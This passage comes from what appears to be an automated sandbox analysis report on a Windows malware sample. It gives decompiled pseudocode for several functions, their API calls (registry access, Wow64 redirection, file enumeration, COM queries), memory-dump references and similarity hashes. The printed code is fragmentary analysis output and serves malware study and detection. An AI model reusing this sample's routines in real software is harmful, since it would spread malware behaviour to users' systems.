					_t33 = E027774F4(_t46, _t48, _t49); // executed
					if(_t33 != 0) {
						 *_a8 = _t48;
						 *_a12 = _t33;
						if( *0x277d204 < 5) {
							 *0x277d204 =  *0x277d204 & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E027753A8();
					HeapFree( *0x277d1f0, 0, _t48);
					goto L9;
				}
				_t50 =  *0x277d2f4; // 0x4f38d6c
				if(RtlAllocateHeap( *0x277d1f0, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t29 = E02773CC4(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36); // executed
				goto L5;
			}

0x027780f6
0x027780fd
0x02778104
0x02778108
0x0277810d
0x02778118
0x02778128
0x0277816b
0x0277816f
0x02778173
0x02778174
0x02778177
0x0277817c
0x0277817c
0x0277817f
0x02778183
0x027781bd
0x027781bd
0x027781c3
0x027781ca
0x027781ca
0x02778185
0x02778188
0x0277818a
0x02778197
0x02778199
0x027781a0
0x027781d7
0x027781dc
0x027781de
0x027781e0
0x027781e0
0x00000000
0x027781de
0x027781a2
0x027781a9
0x027781b7
0x00000000
0x027781b7
0x0277812a
0x02778145
0x0277815f
0x00000000
0x0277815f
0x02778158
0x00000000

APIs

wsprintfA.USER32 ref: 02778118
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0277813D

Part of subcall function 02773CC4: GetTickCount.KERNEL32 ref: 02773CDB
Part of subcall function 02773CC4: wsprintfA.USER32 ref: 02773D28
Part of subcall function 02773CC4: wsprintfA.USER32 ref: 02773D45
Part of subcall function 02773CC4: wsprintfA.USER32 ref: 02773D65
Part of subcall function 02773CC4: wsprintfA.USER32 ref: 02773D83
Part of subcall function 02773CC4: wsprintfA.USER32 ref: 02773DA6
Part of subcall function 02773CC4: wsprintfA.USER32 ref: 02773DC7

HeapFree.KERNEL32(00000000,027738A2,?,?,027738A2,?), ref: 027781B7

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: wsprintf$Heap$AllocateCountFreeTick
String ID:
API String ID: 2794511967-0
Opcode ID: 1df3fe7963a3957cb6a006462e7b0e106898b5ae5346936651cae7d30b438a2f
Instruction ID: e2c485fb087ac4c0f840ab48a135dd8216ccd2d858aca726f18c3069bae3f906
Opcode Fuzzy Hash: 1df3fe7963a3957cb6a006462e7b0e106898b5ae5346936651cae7d30b438a2f
Instruction Fuzzy Hash: C6311972940209EFCF11DF64D988EDA7BB9FF48354F10842AF905A7240D770E969DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02775311, Relevance: 4.6, APIs: 3, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E02775311(void* __ecx, signed char* _a4) {
				signed int _v8;
				void* _v12;
				void* _t13;
				signed short _t16;
				signed int _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t22;
				void* _t23;
				signed short* _t26;
				void* _t27;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr* _t31;

				_t31 = __imp__;
				_t23 = 0;
				_v8 = 1;
				_t28 = 0x277d2e0;
				 *_t31(0, _t27, _t30, _t22, __ecx, __ecx);
				while(1) {
					_t13 = E02773512(_a4,  &_v12); // executed
					if(_t13 == 0) {
						break;
					}
					_push(_v12);
					_t19 = 0xd;
					_t20 = E0277745D(_t19);
					if(_t20 == 0) {
						HeapFree( *0x277d1f0, 0, _v12);
						break;
					} else {
						 *_t28 = _t20;
						_t28 = _t28 + 4;
						_t23 = _t23 + 1;
						if(_t23 < 3) {
							continue;
						} else {
						}
					}
					L7:
					 *_t31(1);
					if(_v8 != 0) {
						_t26 =  *0x277d2e8; // 0x4f39bf0
						_t16 =  *_t26 & 0x0000ffff;
						if(_t16 < 0x61 || _t16 > 0x7a) {
							_t17 = _t16 & 0x0000ffff;
						} else {
							_t17 = (_t16 & 0x0000ffff) - 0x20;
						}
						 *_t26 = _t17;
					}
					return _v8;
				}
				_v8 = _v8 & 0x00000000;
				goto L7;
			}

0x02775318
0x0277531f
0x02775322
0x02775329
0x0277532e
0x02775330
0x02775337
0x0277533e
0x00000000
0x00000000
0x02775340
0x02775345
0x02775346
0x0277534d
0x02775367
0x00000000
0x0277534f
0x0277534f
0x02775351
0x02775354
0x02775358
0x00000000
0x00000000
0x0277535a
0x02775358
0x02775371
0x02775373
0x02775379
0x0277537b
0x02775381
0x02775388
0x02775398
0x02775390
0x02775393
0x02775393
0x0277539b
0x0277539b
0x027753a5
0x027753a5
0x0277536d
0x00000000

APIs

Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0277532E

Part of subcall function 02773512: RtlAllocateHeap.NTDLL(00000000,63699BC3,0277D2E0), ref: 0277353D
Part of subcall function 02773512: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 0277355F
Part of subcall function 02773512: memset.NTDLL ref: 02773579
Part of subcall function 02773512: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 027735B7
Part of subcall function 02773512: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 027735CB
Part of subcall function 02773512: FindCloseChangeNotification.KERNELBASE(?), ref: 027735E2
Part of subcall function 02773512: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 027735EE
Part of subcall function 02773512: lstrcat.KERNEL32(?,642E2A5C), ref: 0277362F
Part of subcall function 02773512: FindFirstFileA.KERNELBASE(?,?), ref: 02773645

Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 02775373

Part of subcall function 0277745D: lstrlen.KERNEL32(?,0277D2E0,75187FC0,00000000,0277534B,?,?,?,?,?,027770B5,?), ref: 02777466
Part of subcall function 0277745D: mbstowcs.NTDLL ref: 0277748D
Part of subcall function 0277745D: memset.NTDLL ref: 0277749F

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,027770B5,?), ref: 02775367

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: Wow64$FileHeap$AllocateEnableFindRedirectionmemset$ChangeCloseCreateFirstFreeNotificationTimelstrcatlstrlenmbstowcs
String ID:
API String ID: 1489712272-0
Opcode ID: ff147d00f4e96caea9ee72954ee620ac47ffc9d711d8dde737a3fc56de438141
Instruction ID: 1d8e4a962aaeee677a063757f2828fdff46fa186fe720de7bd8ef835dd0ba018
Opcode Fuzzy Hash: ff147d00f4e96caea9ee72954ee620ac47ffc9d711d8dde737a3fc56de438141
Instruction Fuzzy Hash: A91126B6A00208EFEF108BA5CC84BFDB7A8FF4531CF904466E901E70A0C3B59951DB64

Uniqueness

Uniqueness Score: -1.00%

Function 027776D6, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E027776D6(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0x277d230; // 0x27ba5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0x277ea60; // 0x4f0053
				_v16 = 4;
				_t31 = E02777404(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0x277d230; // 0x27ba5a8
					_t5 = _t19 + 0x277eabc; // 0x6e0049
					_t34 = E02777404(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E02774C31(_t34);
					}
					E02774C31(_t31);
				}
				return _v8;
			}

0x027776dc
0x027776e1
0x027776e6
0x027776ed
0x027776f9
0x027776fd
0x027776ff
0x02777705
0x02777711
0x02777715
0x02777728
0x02777730
0x02777744
0x0277774c
0x0277774e
0x0277774e
0x02777755
0x02777755
0x0277775c
0x0277775c
0x02777762
0x02777767
0x0277776d

APIs

Part of subcall function 02777404: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,027776F9,004F0053,00000000,?), ref: 0277740D
Part of subcall function 02777404: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,027776F9,004F0053,00000000,?), ref: 02777437
Part of subcall function 02777404: memset.NTDLL ref: 0277744B

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 02777728
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 02777744
RegCloseKey.ADVAPI32(00000000), ref: 02777755

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID:
API String ID: 830012212-0
Opcode ID: 476eaf2419604fc5fc753f6107950039e06682b08f92534c4b9256360e273662
Instruction ID: f62f10991b18f709442104cc99bd6bf0f57b010e3d008b48789918c1428ec002
Opcode Fuzzy Hash: 476eaf2419604fc5fc753f6107950039e06682b08f92534c4b9256360e273662
Instruction Fuzzy Hash: 01116D72A00209BFDF12DBD8CD88FAEB7BCAF04704F1484A9E201E6141DB74DA19DB64

Uniqueness

Uniqueness Score: -1.00%

Function 02777C82, Relevance: 4.6, APIs: 3, Instructions: 52COMMON

Download Yara Rule

APIs

SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 02777CAA
memcpy.NTDLL(?,?,?), ref: 02777CC4

Part of subcall function 027775D9: SysFreeString.OLEAUT32(?), ref: 027776B8

SafeArrayDestroy.OLEAUT32(?), ref: 02777CF9

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: ArraySafe$CreateDestroyFreeStringmemcpy
String ID:
API String ID: 4076844959-0
Opcode ID: 74544d813aabc411d7404847a97a206e08d2586f2ba198aeade059c65c22dc89
Instruction ID: f6f7445221eba0bbc4455898881f04a07678abca6172831ef78d8a7f1aaced54
Opcode Fuzzy Hash: 74544d813aabc411d7404847a97a206e08d2586f2ba198aeade059c65c22dc89
Instruction Fuzzy Hash: FC11397290010ABFDF119FA5DC49EEEBBB9EF18310F008065FA05E6160E3759A25CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05407DEB, Relevance: 4.5, APIs: 3, Instructions: 39registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,059587E8,?), ref: 05407E00
RegOpenKeyA.ADVAPI32(80000001,059587E8,?), ref: 05407E0D
lstrlen.KERNEL32(059587E8,00000000,00000000,00000000,?,?,?,05422097,00000000,00000000,00000001,75144D40,?,?,?,05412103), ref: 05407E2E

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CreateOpenlstrlen
String ID:
API String ID: 2865187142-0
Opcode ID: 262a8dc8898138c5b3cbbfc857d22d5b67380836717babc4770620fd15dce29b
Instruction ID: 569605d0a07a8362148aef391532b0eb95aeb41069058637af2e5e33c81cb333
Opcode Fuzzy Hash: 262a8dc8898138c5b3cbbfc857d22d5b67380836717babc4770620fd15dce29b
Instruction Fuzzy Hash: A1F06D76104218BFEB299F90CC89EEB7FACEF45360F109026FD0292240D770E980C6E2

Uniqueness

Uniqueness Score: -1.00%

Function 05406E6C, Relevance: 4.5, APIs: 3, Instructions: 33COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,?,?,0540398A,00000000,00000000,00000000,0542E140,?,00000000,05407F62,0542E140), ref: 05406E87
IsWow64Process.KERNEL32(?,0542E140,?,00000000,?,?,0540398A,00000000,00000000,00000000,0542E140,?,00000000,05407F62,0542E140,00000000), ref: 05406E98
FindCloseChangeNotification.KERNELBASE(?,?,?,0540398A,00000000,00000000,00000000,0542E140,?,00000000,05407F62,0542E140,00000000,?,?,0542137E), ref: 05406EAB

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Process$ChangeCloseFindNotificationOpenWow64
String ID:
API String ID: 3805842350-0
Opcode ID: 3ae664d2ead9bc650997b624302ed2bd538cbbdace4304c026b8ee5bebbc6736
Instruction ID: 35c144044c91b25dd0538ad423d537c3a794160120d7e67a2dc2a379e6faefac
Opcode Fuzzy Hash: 3ae664d2ead9bc650997b624302ed2bd538cbbdace4304c026b8ee5bebbc6736
Instruction Fuzzy Hash: 0EF05E71900324FF9B219F95C8058EFBABCFB856A1B224166F90AA3240EA304A51D6A5

Uniqueness

Uniqueness Score: -1.00%

Function 0540D933, Relevance: 4.5, APIs: 3, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(000003AC,0540718B), ref: 0540D93D

Part of subcall function 05403D13: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,0540D948), ref: 05403D3C
Part of subcall function 05403D13: RtlDeleteCriticalSection.NTDLL(0542E240), ref: 05403D6F
Part of subcall function 05403D13: RtlDeleteCriticalSection.NTDLL(0542E260), ref: 05403D76
Part of subcall function 05403D13: CloseHandle.KERNEL32(?,?,0540D948), ref: 05403DA5
Part of subcall function 05403D13: ReleaseMutex.KERNEL32(00000308,00000000,?,?,?,0540D948), ref: 05403DB6
Part of subcall function 05403D13: FindCloseChangeNotification.KERNELBASE(?,?,0540D948), ref: 05403DC2
Part of subcall function 05403D13: ResetEvent.KERNEL32(00000000,00000000,?,?,?,0540D948), ref: 05403DCE
Part of subcall function 05403D13: CloseHandle.KERNEL32(?,?,0540D948), ref: 05403DDA
Part of subcall function 05403D13: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,0540D948), ref: 05403DE0
Part of subcall function 05403D13: SleepEx.KERNEL32(00000064,00000001,?,?,0540D948), ref: 05403DF4
Part of subcall function 05403D13: HeapFree.KERNEL32(00000000,00000000,?,?,0540D948), ref: 05403E17
Part of subcall function 05403D13: RtlRemoveVectoredExceptionHandler.NTDLL(042F05B8), ref: 05403E50

CloseHandle.KERNEL32(000003AC), ref: 0540D952
HeapDestroy.KERNELBASE(05560000), ref: 0540D962

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Close$HandleSleep$CriticalDeleteEventHeapSection$ChangeDestroyExceptionFindFreeHandlerMutexNotificationReleaseRemoveResetVectored
String ID:
API String ID: 891263893-0
Opcode ID: 4e251ee489e2842440dcf5ef1ca3edf4c20f1041edeb95c211891824eea0192a
Instruction ID: 15bb174fe186ce66565c1910d2c23e05d83d2d2eb5f5791d6cb1eb6d8985c5d4
Opcode Fuzzy Hash: 4e251ee489e2842440dcf5ef1ca3edf4c20f1041edeb95c211891824eea0192a
Instruction Fuzzy Hash: 94E0EC70B6432197EB245F71AC4EA9B3F9C6F041427991465B406D3280DF34D449D729

Uniqueness

Uniqueness Score: -1.00%

Function 02777B54, Relevance: 3.8, APIs: 3, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02777B54(void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* __ebx;
				void* _t24;
				intOrPtr _t27;
				signed int _t38;
				signed char* _t46;
				void* _t51;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_t51 = __edx;
				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x90;
				_v12 = 0x90;
				_t24 = E027775C4(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x277d280, 0x90);
					_t27 =  *0x277d284; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						E0277735E(_t46, _a4, 0x90, _t27, 0);
					}
					if(E02777A2A( &_v36) != 0 && E0277A83A(0x90, _a4,  &_v20,  &_v12,  &_v36, 0) == 0) {
						_t55 = _v20;
						_v36 =  *_t46;
						_t38 = E027781E9(_a8,  &_v36, _t51, _t46, _a12, _t55); // executed
						_v16 = _t38;
						 *(_t55 + 4) = _v36;
						_t20 =  &(_t46[4]); // 0x8b4875fc
						memset(_t55, 0, _v12 - ( *_t20 & 0xf));
						_t57 = _t57 + 0xc;
						E02774C31(_t55);
					}
					memset(_a4, 0, _t53);
					E02774C31(_a4);
				}
				return _v16;
			}

0x02777b54
0x02777b5a
0x02777b5f
0x02777b6c
0x02777b6f
0x02777b72
0x02777b79
0x02777b7c
0x02777b8a
0x02777b8f
0x02777b94
0x02777b99
0x02777ba4
0x02777ba4
0x02777bb3
0x02777bd1
0x02777bda
0x02777be1
0x02777be9
0x02777bef
0x02777bf2
0x02777bff
0x02777c04
0x02777c08
0x02777c08
0x02777c13
0x02777c1e
0x02777c1e
0x02777c2a

APIs

Part of subcall function 027775C4: RtlAllocateHeap.NTDLL(00000000,00000000,02775068), ref: 027775D0

memcpy.NTDLL(00000000,00000090,027738A2,027738A2,?,?,027738A2,?,?,0277819E,?), ref: 02777B8A
memset.NTDLL ref: 02777BFF
memset.NTDLL ref: 02777C13

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$AllocateHeapmemcpy
String ID:
API String ID: 1529149438-0
Opcode ID: 6e29c1dd11bd4923a0246bf83a0188057c81de50d8d8731c6b161b9dfa8b3ba4
Instruction ID: ed975e6be813c2ad16c16fec9d5abb6bc840119f66e5b190aa0a020eebbe9647
Opcode Fuzzy Hash: 6e29c1dd11bd4923a0246bf83a0188057c81de50d8d8731c6b161b9dfa8b3ba4
Instruction Fuzzy Hash: 03212872A01218BBDF16AFA5CC45FEEBBBDAF09350F044065F904EA241EB34D615CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02774AC1, Relevance: 3.1, APIs: 2, Instructions: 147
serviceCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E02774AC1(intOrPtr _a4) {
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr _t76;
				intOrPtr* _t79;
				short _t81;
				char* _t97;
				intOrPtr _t99;
				void* _t105;
				void* _t107;
				intOrPtr _t111;

				_t81 = 0;
				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0x277d230; // 0x27ba5a8
				_t4 = _t49 + 0x277e448; // 0x4f389f0
				_t5 = _t49 + 0x277e438; // 0x9ba05972
				_t51 =  *0x277d12c(_t5, 0, 4, _t4,  &_v20); // executed
				_t105 = _t51;
				if(_t105 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t97 =  &_v48;
					_push(_t97);
					_push(_t97);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0x277d230; // 0x27ba5a8
						_t30 = _t56 + 0x277e428; // 0x4f389d0
						_t31 = _t56 + 0x277e458; // 0x4c96be40
						_t58 =  *0x277d0f8(_v12, _t31, _t30,  &_v24); // executed
						_t105 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t105 >= 0) {
							_t111 = _v16;
							if(_t111 == 0) {
								_t105 = 0x80004005;
								goto L11;
							} else {
								if(_t111 <= 0) {
									L11:
									if(_t105 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = _v20;
										_v48 = 3;
										_v40 = _t81;
										_t107 = _t107 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
										if(_t105 < 0) {
											goto L7;
										} else {
											_t76 =  *0x277d230; // 0x27ba5a8
											_t23 = _t76 + 0x277e428; // 0x4f389d0
											_t24 = _t76 + 0x277e458; // 0x4c96be40
											_t105 =  *0x277d0f8(_v12, _t24, _t23,  &_v24);
											_t79 = _v12;
											 *((intOrPtr*)( *_t79 + 8))(_t79);
											if(_t105 >= 0) {
												L12:
												_t63 = _v24;
												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t105 >= 0) {
													_t99 =  *0x277d230; // 0x27ba5a8
													_t67 = _v28;
													_t40 = _t99 + 0x277e418; // 0x214e3
													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t81 = _t81 + 1;
									} while (_t81 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t105;
			}

0x02774acc
0x02774ace
0x02774ad5
0x02774ad6
0x02774ad7
0x02774ad8
0x02774ade
0x02774ae3
0x02774aed
0x02774af4
0x02774afa
0x02774afe
0x02774b04
0x02774b0c
0x02774b0d
0x02774b12
0x02774b13
0x02774b15
0x02774b18
0x02774b19
0x02774b1a
0x02774b20
0x02774bb5
0x02774bba
0x02774bc1
0x02774bcb
0x02774bd1
0x02774bd3
0x02774bd9
0x00000000
0x02774b26
0x02774b26
0x02774b2d
0x02774b36
0x02774b3a
0x02774b40
0x02774b43
0x02774baa
0x00000000
0x02774b45
0x02774b45
0x02774bdc
0x02774bde
0x00000000
0x00000000
0x02774b4b
0x02774b4b
0x02774b4b
0x02774b52
0x02774b58
0x02774b5d
0x02774b65
0x02774b66
0x02774b67
0x02774b69
0x02774b6d
0x02774b71
0x00000000
0x02774b73
0x02774b77
0x02774b7c
0x02774b83
0x02774b93
0x02774b95
0x02774b9b
0x02774ba0
0x02774be0
0x02774be0
0x02774bed
0x02774bf1
0x02774bf6
0x02774bfc
0x02774c01
0x02774c0b
0x02774c0d
0x02774c13
0x02774c13
0x02774c16
0x02774c1c
0x00000000
0x00000000
0x00000000
0x02774ba0
0x00000000
0x02774ba2
0x02774ba2
0x02774ba3
0x00000000
0x02774ba8
0x02774b45
0x02774b43
0x02774b3a
0x02774c1f
0x02774c1f
0x02774c25
0x02774c25
0x02774c2e

APIs

IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,04F389D0,0277841C,?,?,?,?,?,?,?,?,?,?,?,0277841C), ref: 02774B8D
IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,04F389D0,0277841C,?,?,?,?,?,?,?,0277841C,00000000,00000000,00000000,006D0063), ref: 02774BCB

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: QueryServiceUnknown_
String ID:
API String ID: 2042360610-0
Opcode ID: 32d7ecc9ac4490a85fea6ed7ae2a98574a24ae68151a52675e514c9afd0d9d7c
Instruction ID: 7ce10b5b7b9ede8261a629fd0ab0b313f316400e9bd0d772a15ce269c2af6674
Opcode Fuzzy Hash: 32d7ecc9ac4490a85fea6ed7ae2a98574a24ae68151a52675e514c9afd0d9d7c
Instruction Fuzzy Hash: BE512A75D00119AFCB00DFA8C898DAEB7B9FF4C314B0589A9E905EB210D771AD45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 027775D9, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E027775D9(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E02778861(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x277d230; // 0x27ba5a8
						_t20 = _t68 + 0x277e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E02771143(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x027775df
0x027775e2
0x027775f2
0x027775fb
0x027775ff
0x027776cd
0x027776d3
0x027776d3
0x02777619
0x0277761e
0x02777622
0x02777628
0x0277762d
0x02777634
0x02777643
0x02777643
0x02777647
0x02777649
0x02777655
0x02777660
0x0277766b
0x0277766f
0x02777679
0x0277767d
0x0277767f
0x02777684
0x0277768b
0x0277769b
0x0277769b
0x02777684
0x0277767d
0x0277769d
0x027776a2
0x027776a7
0x027776a7
0x027776ad
0x027776b3
0x027776b8
0x027776b8
0x027776bd
0x027776c2
0x027776c2
0x027776bd
0x02777647
0x027776c4
0x027776ca
0x00000000

APIs

Part of subcall function 02778861: SysAllocString.OLEAUT32(80000002), ref: 027788B8
Part of subcall function 02778861: SysFreeString.OLEAUT32(00000000), ref: 0277891D

SysFreeString.OLEAUT32(?), ref: 027776B8
SysFreeString.OLEAUT32(0277A412), ref: 027776C2

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
